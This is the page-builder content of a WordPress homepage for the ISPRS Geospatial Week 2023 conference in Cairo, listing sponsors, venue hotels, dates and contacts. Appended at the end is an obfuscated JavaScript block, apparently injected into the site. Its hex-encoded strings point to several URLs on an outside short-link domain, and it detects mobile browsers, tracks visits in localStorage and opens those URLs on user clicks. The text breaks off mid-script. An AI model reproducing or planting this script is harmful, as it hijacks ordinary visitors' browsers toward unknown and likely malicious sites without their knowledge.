/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687710581507{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 